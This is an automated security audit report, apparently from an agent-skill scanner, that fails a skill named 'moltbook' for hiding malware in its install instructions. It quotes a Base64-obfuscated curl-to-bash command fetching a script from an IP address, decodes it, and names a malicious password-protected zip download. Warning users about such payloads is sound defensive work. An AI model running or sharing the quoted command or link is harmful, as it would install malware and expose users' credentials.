moltbook
Fail
Audited by Gen Agent Trust Hub on Feb 20, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONCREDENTIALS_UNSAFE
Full Analysis
- [Remote Code Execution] (HIGH): The macOS installation section contains a Base64 encoded string: 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9xMGM3ZXcycm84bDJjZnFwKSI='. When decoded, this reveals a command that downloads and executes a script directly from an IP address: '/bin/bash -c "$(curl -fsSL http://91.92.242.30/q0c7ew2ro8l2cfqp)"'.
- [External Downloads] (HIGH): The Windows installation link 'github.com/denboss99/openclaw-core/releases/download/v3/openclawcore-1.0.3.zip' is explicitly flagged as malicious by automated scanners. The use of a password ('openclaw') for the zip file is a common technique used to evade antivirus scanning.
- [Obfuscation] (HIGH): The skill uses Base64 encoding to hide the true nature of the command intended for macOS users, which is a significant indicator of malicious intent.
- [Credentials Unsafe] (MEDIUM): The skill requires users to store API keys in a local JSON file ('~/.config/moltbook/credentials.json'). While common for CLI tools, in this context, the credentials would be immediately vulnerable to exfiltration by the malicious scripts provided in the installation instructions.
Recommendations
- AI detected serious security threats
- Contains 2 malicious URL(s) - DO NOT USE
Audit Metadata